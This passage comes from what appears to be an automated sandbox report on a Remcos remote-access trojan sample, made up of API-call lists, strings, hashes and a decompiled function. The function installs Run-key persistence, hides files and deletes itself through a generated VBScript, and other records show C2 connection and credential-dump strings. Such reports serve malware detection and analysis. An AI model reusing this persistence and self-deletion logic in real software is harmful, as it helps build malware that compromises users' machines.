                                          0x0040cbca
                                          0x0040cbcc
                                          0x0040cbd1
                                          0x0040cbd1
                                          0x0040cbd3
                                          0x00000000
                                          0x0040cbd5
                                          0x0040cbd5
                                          0x0040cbd8
                                          0x0040cbda
                                          0x00000000
                                          0x0040cbda
                                          0x0040cbd8
                                          0x00000000
                                          0x0040c859
                                          0x0040c85d
                                          0x0040c862
                                          0x0040c865
                                          0x0040c869
                                          0x0040c86e
                                          0x0040c873
                                          0x0040c876
                                          0x0040c878
                                          0x00000000
                                          0x0040c87a
                                          0x0040c87c
                                          0x00000000
                                          0x0040c87c
                                          0x0040c878
                                          0x0040c853
                                          0x0040c6ec
                                          0x0040c43c
                                          0x0040c440
                                          0x0040c453
                                          0x0040c45a
                                          0x0040c45c
                                          0x0040cbef
                                          0x0040cbf9
                                          0x0040cbfe
                                          0x0040cbfe
                                          0x0040cc03
                                          0x0040cc17
                                          0x0040cc26
                                          0x0040cc2b
                                          0x0040cc33
                                          0x0040cc37
                                          0x0040cc3c
                                          0x0040cc3c
                                          0x0040cc41
                                          0x0040cc42
                                          0x0040cc43
                                          0x0040cc48
                                          0x0040cc4d
                                          0x0040e032
                                          0x0040c177
                                          0x0040c183
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040c45c
                                          0x0040c322
                                          0x0040c322
                                          0x0040c326
                                          0x00000000
                                          0x0040c328
                                          0x0040c328
                                          0x0040c32c
                                          0x0040c32e
                                          0x00000000
                                          0x0040c330
                                          0x0040c330
                                          0x0040c331
                                          0x0040c339
                                          0x0040c33d
                                          0x0040c344
                                          0x0040c34e
                                          0x0040c355
                                          0x0040c357
                                          0x0040c35b
                                          0x0040c360
                                          0x0040c364
                                          0x0040c369
                                          0x0040c36d
                                          0x0040c372
                                          0x0040c37b
                                          0x0040c37d
                                          0x0040c37d
                                          0x0040c37e
                                          0x0040c384
                                          0x0040c384
                                          0x0040c32e
                                          0x0040c326

                                          APIs
                                          • OpenMutexA.KERNEL32 ref: 0040C471
                                          • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
                                          • CloseHandle.KERNEL32(00000000), ref: 0040C48A
                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
                                          • GetLastError.KERNEL32 ref: 0040C4EF
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\logagent.exe,00000104), ref: 0040C510
                                            • Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                                          • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\logagent.exe$Exe$Exe$Inj$Octopus-GM39UT$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                                          • API String ID: 1247502528-3937525246
                                          • Opcode ID: c4514ffebb5a2fcefdb17c9af0de6ab281086a106f02c27a89bcde85ccf605b6
                                          • Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
                                          • Opcode Fuzzy Hash: c4514ffebb5a2fcefdb17c9af0de6ab281086a106f02c27a89bcde85ccf605b6
                                          • Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E0040AD84() {
                                          				char _v28;
                                          				char _v52;
                                          				char _v76;
                                          				char _v100;
                                          				char _v124;
                                          				char _v148;
                                          				short _v668;
                                          				void* _t49;
                                          				void* _t50;
                                          				void* _t53;
                                          				void* _t56;
                                          				signed int _t58;
                                          				void* _t82;
                                          				void* _t84;
                                          				void* _t85;
                                          				void* _t87;
                                          				signed char _t123;
                                          				signed char _t124;
                                          				void* _t227;
                                          				void* _t229;
                                          				void* _t230;
                                          				void* _t231;
                                          
                                          				E0041015B();
                                          				if( *0x46a9d4 != 0x30) {
                                          					L00409D73();
                                          				}
                                          				_t227 =  *0x46bd6b - 1; // 0x0
                                          				if(_t227 == 0) {
                                          					E0041537E(_t227);
                                          				}
                                          				if( *0x46ba75 != 0) {
                                          					E00417754(L00401EEB(0x46c0e0));
                                          				}
                                          				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                          				_t229 =  *0x46bb02 - 1; // 0x1
                                          				if(_t229 == 0) {
                                          					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8)); // executed
                                          				}
                                          				_t230 =  *0x46bafb - 1; // 0x0
                                          				if(_t230 == 0) {
                                          					E00410D5C(0x80000002, _t214, L00401EEB(0x46c4e8));
                                          				}
                                          				_t231 =  *0x46bb00 - 1; // 0x0
                                          				if(_t231 == 0) {
                                          					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
                                          				}
                                          				L00431F00(0,  &_v668, 0, 0x208);
                                          				_t49 = E00402489();
                                          				_t50 = L00401F95(0x46c560);
                                          				_t53 = E00410A30(L00401F95(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49); // executed
                                          				_t232 = _t53;
                                          				if(_t53 == 0) {
                                          					GetModuleFileNameW(0,  &_v668, 0x208);
                                          				}
                                          				RegDeleteKeyA(0x80000001, L00401F95(0x46c518)); // executed
                                          				_t56 = E004074E4(_t232);
                                          				_t233 = _t56;
                                          				if(_t56 != 0) {
                                          					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
                                          				}
                                          				_t58 = SetFileAttributesW( &_v668, 0x80); // executed
                                          				_t123 =  ~_t58;
                                          				asm("sbb bl, bl");
                                          				E004030A6(_t123,  &_v148, E004172DA( &_v76, E00417093( &_v28)), 0, _t233, L".vbs");
                                          				L00401EF0();
                                          				E00401FC7();
                                          				E00404429(_t123,  &_v124, E004030A6(_t123,  &_v28, E0040427F(_t123,  &_v76, E0043987F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
                                          				L00401EF0();
                                          				L00401EF0();
                                          				E00404405(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040427F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                                          				L00401EF0();
                                          				_t124 = _t123 & 0x00000001;
                                          				_t234 = _t124;
                                          				if(_t124 != 0) {
                                          					E00403311(E004030A6(_t124,  &_v28, E00404405(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040427F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
                                          					L00401EF0();
                                          					L00401EF0();
                                          					L00401EF0();
                                          				}
                                          				E00403311(E004030A6(_t124,  &_v100, E004030A6(_t124,  &_v28, E0040427F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
                                          				L00401EF0();
                                          				L00401EF0();
                                          				L00401EF0();
                                          				_t235 = _t124;
                                          				if(_t124 != 0) {
                                          					E0040766C(_t124,  &_v52, 0, L"wend\n");
                                          				}
                                          				_t82 = E004074E4(_t235);
                                          				_t236 = _t82;
                                          				if(_t82 != 0) {
                                          					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
                                          					L00401EF0();
                                          					L00401EF0();
                                          				}
                                          				E0040766C(0x45f724,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                          				_t84 = L00401EEB( &_v124);
                                          				_t85 = E00402489();
                                          				_t87 = E00417947(L00401EEB( &_v52), _t85 + _t85, _t84, 0); // executed
                                          				if(_t87 != 0) {
                                          					ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0); // executed
                                          				}
                                          				ExitProcess(0);
                                          			}


























                                          APIs
                                            • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                            • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AE8E
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AEA1
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AECF
                                          • SetFileAttributesW.KERNELBASE(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AEDD
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                                            • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B0D4
                                          • ExitProcess.KERNEL32 ref: 0040B0DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                          • API String ID: 3659626935-3677834288
                                          • Opcode ID: 4b5536219b413276142a3790f95bbeb577c82c290f89665ed1485fad453a9376
                                          • Instruction ID: 1589e96350d2b26083133e670dfbb90ce18de44782133b39b347ac2ed663d9b9
                                          • Opcode Fuzzy Hash: 4b5536219b413276142a3790f95bbeb577c82c290f89665ed1485fad453a9376
                                          • Instruction Fuzzy Hash: D1816D71A102145ACB15FBA1DCA69EF776A9F50704F10003FB806771E2EE7C5E8A869D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNEL32(00000000,00000029,73B743E0,0046C578,00000000), ref: 0041197A
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                          • gethostbyname.WS2_32(00000000), ref: 00411B6B
                                          • htons.WS2_32(00000000), ref: 00411BA9
                                          • Sleep.KERNEL32(00000000,00000002), ref: 004123A6
                                            • Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                            • Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                            • Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                                          • GetTickCount.KERNEL32 ref: 00411DA2
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001667F,00000000,00000000,00000000), ref: 00412355
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                                          • String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\logagent.exe$Connected to $Connecting to $Disconnected!$Exe$Octopus-GM39UT$[Info]$name
                                          • API String ID: 2130001850-3446537527
                                          • Opcode ID: 53f1d31ab45dcf2409cf5ff9e38295537c92501bbda82d1399bf5fe1de45c5f3
                                          • Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
                                          • Opcode Fuzzy Hash: 53f1d31ab45dcf2409cf5ff9e38295537c92501bbda82d1399bf5fe1de45c5f3
                                          • Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LongNamePath
                                          • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 82841172-1609423294
                                          • Opcode ID: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
                                          • Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
                                          • Opcode Fuzzy Hash: 74f394d82779ad0012b07e917d5bead4f49688195dfc6a98f3ba2cc81fd7d5ca
                                          • Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CountEventTick
                                          • String ID: 8E@
                                          • API String ID: 180926312-787191786
                                          • Opcode ID: 65e043957820a90d4195c6ae94db1a57242de9ddaeba944f8e05ce018c461939
                                          • Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
                                          • Opcode Fuzzy Hash: 65e043957820a90d4195c6ae94db1a57242de9ddaeba944f8e05ce018c461939
                                          • Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323
                                            • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                            • Part of subcall function 0041432B: FindCloseChangeNotification.KERNELBASE( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                                            • Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A
                                          • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
                                          • DeleteFileW.KERNELBASE(00000000,0045F464,0045F464,0045F464), ref: 004105D6
                                          • DeleteFileW.KERNELBASE(00000000,0045F464,0045F464,0045F464), ref: 00410604
                                          • Sleep.KERNELBASE(000001F4,0045F464,0045F464,0045F464), ref: 0041061D
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$Delete$Close$ChangeCurrentFindHandleModuleNameNotificationProcessSleepsend
                                          • String ID: /stext "
                                          • API String ID: 3873159820-3856184850
                                          • Opcode ID: 1adbc206513e4397bd93f4418bf1d54351f2b848565a73fa930f9a925a0b31c1
                                          • Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
                                          • Opcode Fuzzy Hash: 1adbc206513e4397bd93f4418bf1d54351f2b848565a73fa930f9a925a0b31c1
                                          • Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
                                          • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179AE
                                          • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179C0
                                          • CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreatePointerWrite
                                          • String ID:
                                          • API String ID: 1852769593-0
                                          • Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                                          • Instruction ID: 60abe95f3f53f8d2d0590be13cf87a5088bcec8eb26bc593558798ef6058d585
                                          • Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
                                          • Instruction Fuzzy Hash: 8F11E0B1214118BFFB104F649C89EFB777CEB063B2F104266F915D6280C6749E888A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C334), ref: 00404D98
                                          • CreateThread.KERNELBASE(00000000,00000000,?,0046C2E8,00000000,00000000), ref: 00404DAB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DB6
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00404C44,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404DBF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2579639479-0
                                          • Opcode ID: 9d91b7f64c6e39e5a9e8b04c3701a8bcca088cf2191b23a238279e5d499c65d8
                                          • Instruction ID: 953b0e9f26d888488a0b13dcb1c7857754b01e04207d428095d89ba0379a6afb
                                          • Opcode Fuzzy Hash: 9d91b7f64c6e39e5a9e8b04c3701a8bcca088cf2191b23a238279e5d499c65d8
                                          • Instruction Fuzzy Hash: 034171B1900219AFCB10EBA5CC559FEBBBDAF44314F04016EF952B32D1DB38A9458B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,004136FE), ref: 00417A0D
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,004136FE,00000000,00000000,00000000,?,004136FE), ref: 00417A32
                                          • FindCloseChangeNotification.KERNELBASE(00000000,004136FE), ref: 00417A40
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$ChangeCloseCreateFindNotificationReadSize
                                          • String ID:
                                          • API String ID: 2135649906-0
                                          • Opcode ID: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
                                          • Instruction ID: 7ac9442b92b71a3b95e557c57f242bac25566de69d818a97a3fadf0226cee174
                                          • Opcode Fuzzy Hash: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
                                          • Instruction Fuzzy Hash: 1801D670541218BFE7105F61AC89EFF777CDB45396F1001AAF805A3281D6748F019674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • connect.WS2_32(?,?,00000010), ref: 00404A23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: connect
                                          • String ID: TLS Authentication failed$[ERROR]
                                          • API String ID: 1959786783-1964023390
                                          • Opcode ID: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
                                          • Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
                                          • Opcode Fuzzy Hash: 180a3eec618aef65dfdf02a0dca60cfd7839a15393646ce557064cfd6efdf8ed
                                          • Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,0046C500,80000002,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D6A
                                          • RegDeleteValueW.KERNELBASE(0046C500,0046C518,?,0040AE30,00000000,?,0046C518,0046C500), ref: 00410D7E
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00410D68
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteOpenValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 2654517830-1051519024
                                          • Opcode ID: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
                                          • Instruction ID: 75ebaf3219d9d67017fe3971026eac3f4578a9a4a068ccc2e26b180b3f179870
                                          • Opcode Fuzzy Hash: 4fad1368e3560850efc42bff900c7ba9b40029ea3229a6a7c2dc80faaaf5e034
                                          • Instruction Fuzzy Hash: D1E0C231284308BBEF104FB1EC07FFA772CEB01F42F1002A5B90692091C666DB549664
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                                          • CloseHandle.KERNEL32(?), ref: 0041434A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Close$ChangeFindHandleNotification
                                          • String ID: _@
                                          • API String ID: 4069496961-2364776441
                                          • Opcode ID: 58aded64bf1e59f1414464173308a418173fcc3aae8707c786a46d3112efcba5
                                          • Instruction ID: 593f2f721d058f847ab3d215af488efc5a805750498aadbe0de6bb03fde21c1b
                                          • Opcode Fuzzy Hash: 58aded64bf1e59f1414464173308a418173fcc3aae8707c786a46d3112efcba5
                                          • Instruction Fuzzy Hash: 7FD05E35C4221C7F8F007FA4AC0A8ADB77CFA09202B540596F828822129A7699548A64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                          • RegCloseKey.KERNELBASE(00000000), ref: 00410A70
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
                                          • Instruction ID: 441e9820231bba63bf934a94159cc2a1568a4eaa66ed414e7fe82764e71c2100
                                          • Opcode Fuzzy Hash: c6bf9776d3f6db4a4e763afb8c0664460806c1accb4e7b0a446a59c5926fe9c4
                                          • Instruction Fuzzy Hash: E5014B3180022DFBCF219FA1DC49DEB7F38EF157A1F004165BA08621A1D6759AA5DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
                                          • RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
                                          • RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID:
                                          • API String ID: 1818849710-0
                                          • Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                          • Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
                                          • Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                          • Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00447661
                                          • _free.LIBCMT ref: 0044769A
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004476A1
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentStrings$Free_free
                                          • String ID:
                                          • API String ID: 2716640707-0
                                          • Opcode ID: 27d41aaa42e1a61686c2f6423c82f47d9fa0cff0111fc9c4d1ec0e2f68d4e86f
                                          • Instruction ID: 4b3672921d85d94027c856c8d4557e31c130c3ea1869d6c91df0e3c849bae827
                                          • Opcode Fuzzy Hash: 27d41aaa42e1a61686c2f6423c82f47d9fa0cff0111fc9c4d1ec0e2f68d4e86f
                                          • Instruction Fuzzy Hash: 8AE0E537149A112AE222223A6C49E7B3619CFC67BA716002BF10886142DF288D0305AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
                                          • RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041092C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                          • Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
                                          • Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                          • Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                          • RegCloseKey.KERNELBASE(?), ref: 004108CE
                                          Memory Dump Source
